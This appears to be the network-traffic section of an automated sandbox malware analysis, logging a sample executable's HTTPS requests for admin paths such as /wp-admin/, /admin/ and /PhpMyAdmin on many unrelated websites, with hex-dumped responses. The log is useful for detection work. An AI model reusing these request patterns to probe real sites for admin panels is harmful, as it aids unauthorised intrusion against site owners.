                                                                                                                                                                                                    2023-11-26 05:59:45 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 37 2e 32 2e 33 34 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closex-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; s
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC813INData Raw: 32 34 33 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 50 45 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 49 6e 69 63 69 61 72 20 73 65 73 69 c3 b3 6e 20 26 6c 73 61 71 75 6f 3b 20 53 61 6d 73 6f 6e 20 43 6f 6e 74 72 6f 6c 73 20 50 65 72 c3 ba 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 21
                                                                                                                                                                                                    Data Ascii: 2435<!DOCTYPE html><html lang="es-PE"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Iniciar sesin &lsaquo; Samson Controls Per &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><!
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC8464INData Raw: 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 6f 67 69 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 6d 73 6f 6e 2e 70 65 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 53 69 74 65 20 4b 69 74 20 62 79 20 47 6f 6f 67 6c 65 20 31 2e 31 31 34 2e 30 22 20 2f 3e 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: l='stylesheet' id='login-css' href='https://samson.pe/wp-admin/css/login.min.css?ver=6.4.1' type='text/css' media='all' /><meta name="generator" content="Site Kit by Google 1.114.0" /><meta name='referrer' content='strict-origin-when-cross-origin' />
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    457192.168.2.45154034.240.130.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC174OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: www.harasduberry.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC231INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingstrict-transport-security: max-age=604800Server: nginx
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16153INData Raw: 66 33 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 6a 69 6d 63 64 6e 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 6a 69 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d
                                                                                                                                                                                                    Data Ascii: f3d<!DOCTYPE html><html lang="fr-FR"><head> <meta charset="utf-8"/> <link rel="dns-prefetch preconnect" href="https://u.jimcdn.com/" crossorigin="anonymous"/><link rel="dns-prefetch preconnect" href="https://assets.jimstatic.com/" crossorigin=
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16384INData Raw: 72 65 73 20 63 68 65 76 61 75 78 20 c3 a0 20 76 65 6e 64 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 69 64 3d 22 63 63 2d 6e 61 76 2d 76 69 65 77 2d 32 31 31 35 39 31 35 33 37 39 22 20 63 6c 61 73 73 3d 22 6a 6d 64 2d 6e 61 76 5f 5f 6c 69 73 74 2d 69 74 65 6d 2d 30 20 6a 2d 6e 61 76 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 66 6f 73 2d 70 72 61 74 69 71 75 65 73 2d 70 61 72 2d 72 61 63 65 2f 22 20 64 61 74 61 2d 6c 69 6e 6b 2d 74 69 74 6c 65 3d 22 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 22 3e 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 3c 2f 61 3e 3c 73 70 61 6e 20 64 61 74 61 2d 6e 61 76 69 2d 74 6f 67 67 6c 65 3d 22 63 63 2d
                                                                                                                                                                                                    Data Ascii: res chevaux vendre</a></li></ul></li><li id="cc-nav-view-2115915379" class="jmd-nav__list-item-0 j-nav-has-children"><a href="/infos-pratiques-par-race/" data-link-title="Infos pratiques par race">Infos pratiques par race</a><span data-navi-toggle="cc-
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC7301INData Raw: 20 64 65 20 63 6f 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 5c 6e 5c 6e 4c 65 73 20 63 6f 6f 6b 69 0d 0a 31 63 35 32 0d 0a 65 73 20 64 65 20 63 6f 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 20 70 65 72 6d 65 74 74 65 6e 74 20 61 75 20 76 69 73 69 74 65 75 72 20 64 75 20 73 69 74 65 20 64 27 61 75 74 6f 72 69 73 65 72 20 6c 65 73 20 73 65 72 76 69 63 65 73 5c 2f 63 6f 6f 6b 69 65 73 20 73 5c 75 30 30 65 39 6c 65 63 74 69 6f 6e 6e 5c 75 30 30 65 39 73 20 65 74 20 65 6e 72 65 67 69 73 74 72 65 6e 74 20 6c 65 75 72 73 20 70 72 5c 75 30 30 65 39 66 5c 75 30 30 65 39 72 65 6e 63 65 73 20 65 6e 20 6d 61 74 69 5c 75 30 30 65 38 72 65 20 64 65 20 63 6f 6f 6b 69 65 73 2e 5c 6e 5c 6e 50 72 65 73 74 61 74 61 69 72 65 20 3a 5c 6e 4a 69 6d 64 6f 20 47
                                                                                                                                                                                                    Data Ascii: de contr\u00f4le Jimdo\n\nLes cooki1c52es de contr\u00f4le Jimdo permettent au visiteur du site d'autoriser les services\/cookies s\u00e9lectionn\u00e9s et enregistrent leurs pr\u00e9f\u00e9rences en mati\u00e8re de cookies.\n\nPrestataire :\nJimdo G


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    458192.168.2.45170115.235.14.1414436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC167OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC473INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 44 72 75 70 61 6c 2d 44 79 6e 61 6d 69 63 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: must-revalidate, no-cache, privateX-Drupal-Dynamic-Cache: HITX-UA-Compati
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC15911INData Raw: 37 39 35 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: 795e<!DOCTYPE html><html lang="es" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC15172INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 2f 64 65 66 2d 75 6e 69 2d 73 6f 6d 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 65 66 65 6e 73 6f 72 c3 ad 61 20 55 6e 69 76 65 72 73 69 74 61 72 69 61 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 61 6a 2e 65 6e 63 69 63 6c 6f 2e 65 73 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 42 69 62 6c 69 6f 74
                                                                                                                                                                                                    Data Ascii: </a></li><li class="menu-item"><a href="/es/def-uni-somos"> Defensora Universitaria </a></li><li class="menu-item"><a href="https://unaj.enciclo.es/"> Bibliot


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    459192.168.2.451636185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC225OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.grantstech.io/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC307INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 58 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 42 59 50 41 53 53 0d 0a 58
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=0Expires: Sun, 26 Nov 2023 05:59:45 GMTVary: Accept-EncodingX-Cache-Status: BYPASSX
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC634INData Raw: 32 36 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 63 72 69
                                                                                                                                                                                                    Data Ascii: 26e<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="descri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    460192.168.2.45179813.32.208.274436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC173OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.perrisesd.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1145INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 31 30 2e 30 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 3067Connection: closeDate: Sun, 26 Nov 2023 05:59:45 GMTCache-Control: privateServer: Microsoft-IIS/10.0Strict-Transport-Security: max-age=31536000; includeSubDomain
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC3067INData Raw: 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 72 72 69 73 65 73 64 2e 6f 72 67 2f 53 74 61 74 69 63 2f 2f 73 69 74 65 2f 61 73 73 65 74 73 2f 53 74 79 6c 65 73 2f 73 79 73 74 65 6d 5f 32 37 34 31 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                                                                                                                                                    Data Ascii: <html><head> <link rel="Stylesheet" type="text/css" href="https://www.perrisesd.org/Static//site/assets/Styles/system_2741.css" /> <title>Error 404 - Page Not Found</title> <style type="text/css"> @font-face { font


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    461192.168.2.451381199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC190OUTGET /PhpMyAdmin HTTP/1.1
                                                                                                                                                                                                    Host: www.gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1123INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 75 62 6c 69 73 68 65 64 73 69 74 65 2d 78 73 72 66
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCache-Control: no-cache, privateDate: Sun, 26 Nov 2023 05:59:45 GMTSet-Cookie: publishedsite-xsrf
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC607INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 73 78 4d 48 4a 32 56 32 64 46 4e 32 51 35 64 31 52 56 61 7a 49 35 51 33 5a 68 54 46 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4f 45 31 33 4f 47 51 72 53 54 46 6f 64 55 78 6a 52 45 64 32 4f 48 5a 31 54 6c 6c 52 52 57 64 4f 57 6e 4e 33 54 54 6c 72 57 6e 6c 56 4e 32 52 78 65 55 52 44 4d 6c 4e 68 63 32 4e 75 61 48 42 74 57 45 68 57 5a 31 4e 6e 65 6c 42 6d 52 7a 6b 30 56 47 74 42 56 6a 52 4c 59 56 4e 49 52 30 4a 75 4e 6b 64 45 64 6d 46 72 5a 6c 4e 73 61 6d 6f 78 4c 32 46 59 59 6d 31 72 62 58 6c 75 4e 6d 68 36 52 6c 70 31 61 45 70 47 4e 7a 52 36 61 57 4e 4f 4e 6b 46 50 62 32 64 52 56 33 6c 59 5a 32 49 7a 64 57 70 6f 54 6b
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6IksxMHJ2V2dFN2Q5d1RVazI5Q3ZhTFE9PSIsInZhbHVlIjoiOE13OGQrSTFodUxjREd2OHZ1TllRRWdOWnN3TTlrWnlVN2RxeURDMlNhc2NuaHBtWEhWZ1NnelBmRzk0VGtBVjRLYVNIR0JuNkdEdmFrZlNsamoxL2FYYm1rbXluNmh6Rlp1aEpGNzR6aWNONkFPb2dRV3lYZ2IzdWpoTk
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1580INData Raw: 36 32 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 20 41 72 69 61 6c 2c 20 73 61
                                                                                                                                                                                                    Data Ascii: 620<!doctype html><html><head> <title>404 - Page Not Found</title> <style type="text/css"> html, body { height: 100%; margin: 0; padding: 0; font-family: Roboto, Helvetica Neue, Arial, sa


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    462192.168.2.45179923.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC169OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.avient.com
